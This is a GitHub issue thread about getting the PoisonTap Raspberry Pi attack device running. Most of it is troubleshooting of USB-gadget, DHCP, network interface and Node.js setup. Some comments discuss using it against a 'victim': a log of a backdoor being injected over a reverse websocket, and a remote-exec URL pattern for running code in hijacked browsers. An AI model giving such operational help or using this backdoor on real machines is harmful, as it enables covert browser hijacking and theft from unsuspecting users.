samyk/poisontap #19: Problems to get started

tomnick, 2016-11-18:
Hi, I installed everything so far and getting the following errors:

< /home/pi/poisontap/pi_startup.sh: 8: cd: can't cd to /sys/kernel/config/usb_gadget/
ln: failed to create symbolic link ‘configs/c.1/acm.usb0’: File exists
ln: failed to create symbolic link ‘configs/c.1/ecm.usb0’: File exists
ls: cannot access /sys/class/udc: No such file or directory
Ignoring unknown interface usb0=usb0.
usb0: ERROR while getting interface flags: No such device
SIOCADDRT: No such device
[....] Starting isc-dhcp-server (via systemctl): isc-dhcp-server.serviceJob for isc-dhcp-server.service failed. See 'systemctl status isc-dhcp-server.service' and 'journalctl -xn' for details.
 failed!
net.ipv4.ip_forward = 1

systemctl status isc-dhcp-server.service:

> isc-dhcp-server.service - LSB: DHCP server
   Loaded: loaded (/etc/init.d/isc-dhcp-server)
   Active: failed (Result: exit-code) since Fri 2016-11-18 16:21:50 UTC; 22s ago
  Process: 3556 ExecStart=/etc/init.d/isc-dhcp-server start (code=exited, status=1/FAILURE)

Any idea what could be wrong?

samyk, 2016-11-18:
Hmm, there may be some initial setup that I forgot to cover -- check the modular section here:
https://gist.github.com/gbaman/50b6cca61dd1c3f88f41

samyk, 2016-11-18:
Also, dsniff (which contains dnsspoof), screen, node.js, and dhcpd need to be installed (via apt-get should be fine)

jreziga, 2016-11-18:
@samyk And what is the dhcpd.conf configuration ?

foreverrising, 2016-11-18:
I recommend splitting pi_startup.sh into a pi_config.sh and a bash script which is run on startup. 
Also, you can add these lines to a config script to setup the pi as a usb gadget and install dependancies:

echo "dwc_otg.lpm_enable=0 console=serial0,115200 console=tty1 root=/dev/mmcblk0p2 rootfstype=ext4 elevator=deadline fsck.repair=yes rootwait modules-load=dwc2,g_ether" > /boot/cmdline.txt
echo "" >> /boot/config.txt
echo "dtoverlay=dwc2" >> /boot/config.txt
apt-get update && apt-get upgrade
apt-get install dsniff isc-dhcp-server nodejs screen

I'm unsure exactly which package you use for the dhcp server- apt-get installs udhcpd when trying to install dhcpd. Also, there is a package node as well as a package nodejs.

The main issue I'm facing is the dhcp server daemon fails to start-- obviously we listen for dhcp requests on usb0, but I haven't deduced the scope yet.

samyk, 2016-11-18:
@jreziga Added dhcpd.conf in 838a0353c606cc815b26e290e8347a08e18312ba

samyk, 2016-11-18:
Also, updating installation instructions but you'll want `apt-get -y install isc-dhcp-server dsniff screen nodejs`

samyk, 2016-11-18:
@tomnick With @foreverrising's instructions and #838a0353c606cc815b26e290e8347a08e18312ba, do things work properly for you?

samyk, 2016-11-18:
I've also added some additional installation instructions in 26dd7818a8f74daa81e156a106cde8fffdc19004

jreziga, 2016-11-18:
There are still issues on my side. 

(Auto-assigned IP)
[image] 

(IP address and mask)
[image]

DHCP server can't start well
[image]
not much informations on log...
[image]

dhcpd.conf is the same you just provided
[image]

Still troubleshooting I'll post here if I find smthg

samyk, 2016-11-18:
Ah, also need to set the IP up:
echo -e "\nauto usb0\nallow-hotplug usb0\niface usb0 inet static\n\taddress 1.0.0.1\n\tnetmask 0.0.0.0" >> /etc/network/interfaces
Then reboot and test

jreziga, 2016-11-18:
@samyk I was writing a post to ask you your /etc/network/interfaces file, nice move ;)

foreverrising, 2016-11-18:
I used /etc/dhcpd.conf for the static IP. Does editing the interfaces file
work for you?

jreziga, 2016-11-18:
@foreverrising dhcpd.conf goes inside `/etc/dhcp/dhcpd.conf` and no `/etc/dhcpd.conf`

Plus you need to run `echo -e "\nauto usb0\nallow-hotplug usb0\niface usb0 inet static\n\taddress 1.0.0.1\n\tnetmask 0.0.0.0" >> /etc/network/interfaces`  (try logged as root, I was unable to do this with this one line command with sudo)

And yes it worked. 

@samyk I'm playing with it now. I'm still having some questions like : 
- If the victime had on his browser "nfl.com" opened. Is it working directly when you plug the Rpi ? Or do the user need to refresh the page on his browser ? (It seems like the 1st scenario isn't working or am I doing smthg wrong ?)

I've setup my server with port 1337 wide open but I can't get any reverse websocket connection.
In the Rpi logs I see that backdoor.html is injected 

```javascript
>>> Inject Backdoor HTML reverse ws 1337
Request: 1.0.0.1.pin.ip.samy.pl/PoisonTap
{ host: '1.0.0.1.pin.ip.samy.pl',
  connection: 'keep-alive',
  'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36',
  accept: 'image/webp,image/*,*/*;q=0.8',
  'accept-encoding': 'gzip, deflate, sdch',
  'accept-language': 'fr-FR,fr;q=0.8,en-US;q=0.6,en;q=0.4' }
```
But nothing on the node server console output

foreverrising, 2016-11-19:
I'll try again  with a sudo su -. What does
ip a show with the static (set with the interfaces file)?

NFL.com seemed to reload every minute or so, I think it was chosen for the
example for this reason. I haven't looked at the source and meta tags for
the site though.

Also, I don't use newline characters in an echo command. Just habit for me.

jreziga, 2016-11-19:
I wrote a small installation guide. Check at the bottom of this page: https://github.com/jreziga/poisontap/blob/068c2836deb61b150946acf3395ccf11eb3b3ad1/README.md

tomnick, 2016-11-19:
Alright, mine is running now like a charme... is there any instruction on how to use the tools like backend_server.js or how to access remotely etc?

JonathanNathanson, 2016-11-20:
@tomnick backend_server.js is a pretty simple script, if you read it you should be able to see how it works. I've not got anything open right now but I'm pretty sure you can just do a http request to:

`yourserver.com:port?exec=your_code_here`

See Samy's examples in the readme

samyk, 2016-11-20:
Also note the backdoor has jQuery built in so you have full access to jQuery functionality

tomnick, 2016-11-20:
Which websocket library is the project based on?

samyk, 2016-11-20:
https://www.npmjs.com/package/websocket

tomnick, 2016-11-20:
Getting this error on my server trying to install in the directory "poisontap" with the "backend_server.js" file included only:

npm install websocket

> websocket@1.0.23 install /root/node_modules/websocket
> (node-gyp rebuild 2> builderror.log) || (exit 0)

/root
├── nodejs-websocket@1.7.1 
└── websocket@1.0.23 

npm WARN enoent ENOENT: no such file or directory, open '/root/package.json'
npm WARN root No description
npm WARN root No repository field.
npm WARN root No README data
npm WARN root No license field.

samyk, 2016-11-20:
Try: sudo npm -g install websocket

Also, make sure you're on Node v6.

tomnick, 2016-11-20:
This is it...working...thanks a lot...

foreverrising, 2016-11-20:
Should add package npm to the apt-get line of the script and a npm -g
websocket line as well.

JonathanNathanson, 2016-11-21:
Worth noting that the ReadMe says that NodeJS may already be installed. Yes, it is, but a very old version (0.10.29??) so you need to install this v6.

First you need to remove all references to the current version 👍 
`sudo apt-get remove nodered -y
sudo apt-get remove nodejs nodejs-legacy -y
sudo apt-get remove npm -y`

then:

`wget https://nodejs.org/dist/latest-v6.x/node-v6.9.1-linux-armv6l.tar.gz
tar -xvf node-v6.9.1-linux-armv6l.tar.gz
cd node-v6.9.1-linux-armv6l
sudo cp -R * /usr/local/
sudo reboot`

Now you have an updated version of Node that will run just fine.

tomnick, 2016-11-21:
Did exact what you wrote and the results after reboot are:

> node -v
The program 'node' is currently not installed. You can install it by typing:
apt install nodejs-legacy

So after I did intall nodejs-legacy:

> node -v
v4.2.6

No v6!

JonathanNathanson, 2016-11-21:
I've just reformatted so that it's obvious that each is a seperate command, can't just copy and paste the whole line...

tomnick, 2016-11-21:
Done but now this error:

> node -v
-bash: /usr/local/bin/node: cannot execute binary file: Exec format error

tomnick, 2016-11-27:
Where (Directory) to unpack the top Alexa?

cksj, 2017-08-11:
djsjflkdsjflksdjf

cksj, 2017-08-11:
ln: failed to create symbolic link ‘configs/c.1/acm.usb0’: File exists
sh: echo: I/O error
sh: echo: I/O error
ln: failed to create symbolic link ‘configs/c.1/ecm.usb0’: File exists
ls: write error: Device or resource busy
ifup: interface usb0 already configured
SIOCADDRT: File exists
[ ok ] Starting isc-dhcp-server (via systemctl): isc-dhcp-server.service.
net.ipv4.ip_forward = 1

How do you solve this problem? Ask the great god for help